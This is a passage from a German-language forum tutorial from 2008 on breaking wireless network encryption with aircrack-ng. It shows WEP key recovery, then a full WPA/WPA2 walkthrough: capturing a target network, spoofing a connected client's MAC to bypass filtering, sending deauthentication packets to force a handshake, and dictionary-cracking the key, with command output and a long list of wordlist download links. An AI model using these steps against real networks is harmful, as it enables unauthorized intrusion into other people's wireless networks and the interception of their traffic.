3 0/ 1 62( 154) F5( 13) 76( 12) BE( 12) BD( 8) BB( 5) 90( 3) E5( 3) F2( 3) F6( 3) 20( 0) 21( 0) 97( 0) 9D( 0) AB( 0) B2( 0) BC( 0)

KEY FOUND! [ 62:6C:61:62:6C ] (ASCII: blabl )
Decrypted correctly: 100%


Kurze Erklärung:
  • -b 11:11:11:11:11:11 Die bssid des Accesspoint.
  • *.cab Die .cap Dateien die airodump-ng mitgeschnitten hat.

Auch hier gilt wieder, sollten noch nicht genügent IVs gesammelt wurden sein, dann könnt ihr mit STRG+C abbrechen. Wurden dann genug IVs gesammelt sollte aircrack-ng den Schlüssel in Sekunden berechnen können.

Ihr könnt auch hier wieder aircrack-ng den Parameter "-z" mitgeben, dann wird die neue PTW WEP-Cracking Methode verwendet. Aber dies ist nur effektiv bei Schlüsseln mit 40 oder 104 bit Schlüssellänge. Ist aber dafür wesentlich schneller und CPU schonender.
Die PTW-Methode funktioniert nur erfolgreich mit arp request/reply-Paketen.
Daher dürft ihr nicht die "--ivs" Option bei airodump-ng benutzen!

Wenn Ihr nicht mit der "-z" Option arbeitet, dann wird die FMS / Korek-Methode angewendet um den WEP-Schlüssel zu kacken. Dazu müssen etwa 250000 IVs für einen 64-Bit und 1500000 IVs für einen 128bit-Schlüssel gesammelt werden. Das sind aber ungefähre Werte, wie viele IVs man tatsächlich braucht ist Variable.

Tips zur Fehlersuche bei aircrack-ng
Manchmal muss man verschiedene Techniken versuchen, um den WEP-Schlüssel zu knacken. Oft muss man auch den Parameter "-n" benutzen, um die verschiedenen Schlüssellängen zu definieren. Man kann auch den Parameter "-f" versuchen, um verschiedene Faktoren pfuschen. Mit "-k" kann man Berichtigungsmethoden deaktivieren.

Alternativ zu aircrack-ng könnt ihr natürlich auch wieder aircrack-ptw dafür verwenden, hier gilt das selbe wie bei aircrack-ng mit dem Parameter "-z":
aircrack-ptw out-01.cap

Wie bereits bei "WEP Open Authentication" gesagt kann man aircrack-ptw leider nur eine .cap Datei mitgeben.



Greeez Oli


Dieser Beitrag wurde 23 mal editiert, zuletzt von Zyrusthc am 23.02.2008 - 15:01.
Beitrag vom 16.02.2008 - 19:46
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
6. WPA/WPA2

Dieses Beispiel beschreibt die vorgehensweise bei einem Accesspoint mit WPA PSK Verschlüsselung:

WPA Passwörter können nicht aus IVs erechnet werden. Um an das Passwort eines mit WPA verschlüsselten Accesspoints zu kommen, bietet sich nur die Möglichkeit des Brute-Force Angriffes. Dazu ist ein Wörterbuch im ASCI Format erforderlich.

Wenn man das Passwort nicht in seinen Wörterbuch hat, dann kommt man auch nicht an das Passwort!
Schaut euch mal den Brute Force time Calculator an, damit lässt sich errechnen wie lange man in verschienden Szenarien man brauchen würde.

Wörterbucher könnt ihr euch zu dutzenden im Internet runterladen.
Siehe 7. Links --> Wörterbücher:
Oder baut euch ein eigenes Wörterbuch mit dem John the Ripper password cracker.



Als erstes ermitteln wir wieder die vorhandenen Netzwerke mit airodump-ng
airodump-ng rausb0

Zitat
CH 8 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WPA CCMP PSK WLAN
22:22:22:22:22:22 -1 41 258 0 7 54 WPA CCMP PSK <length: 0>

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9
22:22:22:22:22:22 33:33:33:33:33:33 -1 0 259


Abbrechen wieder mit STRG+C

Wir interessieren uns wieder für den Accesspoint mit der Essid WLAN und der MAC Adresse "11:11:11:11:11:11" auf Kanal 10. Jetzt lassen wir uns den verschlüsselten dump von Kanal 10 und der bssid "11:11:11:11:11:11" nach out schreiben
airodump-ng -c 10 --bssid 11:11:11:11:11:11 -w out rausb0

Zitat
CH 10 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WPA CCMP PSK WLAN

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9


Kurze Erklärung:
  • -c 10 auf Kanal 10 hören
  • --bssid 11:11:11:11:11:11 nur die Bssid 11:11:11:11:11:11 abhören
  • -w out Die Ausgabe in die Datei out-0X schreibe, X wird bei erneuten Start 1-2-3 usw.
  • rausb0 Das WLAN Interface

Wie wir sehen ist gerade ein Client mit der MAC Adresse "00:11:22:33:44:55" mit dem Accespoint "11:11:11:11:11:11" verbunden.

Jetzt öffnen wir erst einmal ein weiteres Terminal.

Da oft auch ein MAC Filter aktiv ist, ist es empfehlenswert seiner WLAN-NIC diese MAC zu verpassen. Dies kann man mit folgenden Befehl erledigen:
ifconfig rausb0 hw ether 00:11:22:33:44:55

Als erstes senden wir nun einen deauth Attacke an den Accesspoint, so das dieser nun denkt der Client währe disconnected. Nun versucht sich der Client wieder am Accesspoint anzumelden, dabei findet nun der so genannte Four-Way-Handshake statt, den wir mit airodump-ng im 1. Terminal mitschschneiden.

aireplay-ng -0 5 -b 11:11:11:11:11:11 -a 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0

Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig wlan1 hw ether 00:11:22:33:44:55
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
22:22:35 Sending DeAuth to broadcast -- BSSID: [11:11:11:11:11:11]
22:22:36 Sending DeAuth to broadcast -- BSSID: [11:11:11:11:11:11]
22:22:37 Sending DeAuth to broadcast -- BSSID: [11:11:11:11:11:11]
22:22:37 Sending DeAuth to broadcast -- BSSID: [11:11:11:11:11:11]
22:24:21 Sending DeAuth to broadcast -- BSSID: [11:11:11:11:11:11]


Kurze Erklärung:
  • -0 5 deauth Attacke 5x senden
  • -b 11:11:11:11:11:11 an diese Bssid.
  • -a 11:11:11:11:11:11 setze Access Point MAC Addresse.
  • -h 00:11:22:33:44:55 setze Quell MAC Adresse.
  • rausb0 Das WLAN Interface


Normalerweise sollte jetzt in der .cap Datei die airodump-ng schreibt ein Handshake vorhanden sein. Jetzt kommt eure Wörterbuchdatei zum Einsatz.
Der Parameter -w gibt die Wörterbuchdatei an.

aircrack-ng -w pw.txt out-01.cap

Zitat
1 11:11:11:11:11:11 WLAN WPA (1 handshake)



Zitat
Aircrack-ng 0.9.2


[00:00:02] 310 keys tested (131.59 k/s)


KEY FOUND! [ 1234567890 ]


Master Key : DB BB 7A C3 9F 75 7E 12 BC 12 90 4D 80 89 19 FC
C3 AC 2A 7A 8A 32 63 8C 7D 0E 1C 6A 3F 70 63 FB

Transcient Key : 3E C2 AF 50 B9 AE D0 42 E5 97 9C 27 3E FF C8 D2
01 7D 5D D9 30 FD 6B 8D FF BD 43 75 3A 1D C7 E7
33 D6 2E CB 29 E1 8A 95 A1 11 80 8A 8D 07 AD D5
52 2B F0 2C 78 63 1D 3A 7C 50 99 70 EB 8D 59 F6

EAPOL HMAC : 8C 3D 73 FE E0 1B 49 E1 3A 02 D0 E3 06 23 2D 4B





Greeez Oli


Dieser Beitrag wurde 7 mal editiert, zuletzt von Zyrusthc am 23.02.2008 - 15:02.
Beitrag vom 16.02.2008 - 22:40
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
7. Links

Wissenswertes:
http://de.wikipedia.org/wiki/Aircrack
http://de.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://de.wikipedia.org/wiki/Pre-shared_key
http://de.wikipedia.org/wiki/Wi-Fi_Protected_Access

Dokumenation:
http://www.aircrack-ng.org
http://www.aircrack-ng.org/doku.php?id=Main#documentation
http://www.aircrack-ng.org/doku.php?id=tutorial
http://www.aircrack-ng.org/doku.php?id=shared_key
http://www.aircrack-ng.org/doku.php?id=fragmentation
http://www.aircrack-ng.org/doku.php?id=korek_chopchop
http://www.aircrack-ng.org/doku.php?id=interactive...ket_rep lay
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
http://repat.re.ohost.de/aircrack.html

Wörterbücher:
http://ftp.sunet.se/pub/security/tools/net/Openwal...wordlis ts/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.theargon.com/achilles/wordlists/
http://theargon.com/achilles/wordlists/theargonlists/
ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
https://www.securinfos.info/wordlists_dictionnaires.php
http://www.lostpassword.com/f/wl/bigdict.zip
http://www.lostpassword.com/f/wl/French.zip
http://www.lostpassword.com/f/wl/Spanish.zip
http://www.lostpassword.com/f/wl/German.zip
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.openwall.com/mirrors/
http://www.insidepro.com/eng/download.shtml
ftp://ftp.ox.ac.uk/pub/wordlists/
http://www.word-list.com/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.bastisoft.de/sprache/adelung/adelung-1201.zip

Rechtliches:
http://www.wardriving-forum.de/forum/showpost.php?...stcount =23




Greeez Oli


Dieser Beitrag wurde 4 mal editiert, zuletzt von Zyrusthc am 18.02.2008 - 19:43.
Beitrag vom 16.02.2008 - 23:21
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen verstecken
Seiten (1): (1) vorheriges Thema   nächstes Thema

Gehe zu:  
Es ist / sind gerade 0 registrierte(r) Benutzer und 63 Gäste online. Neuester Benutzer: Scarez
Mit 3855 Besuchern waren am 02.09.2011 - 14:07 die meisten Besucher gleichzeitig online.
Aktive Themen der letzten 24 Stunden | Foren-Topuser
 
Seite in 0.95723 Sekunden generiert


Diese Website wurde mit PHPKIT WCMS erstellt
PHPKIT ist eine eingetragene Marke der mxbyte GbR © 2002-2009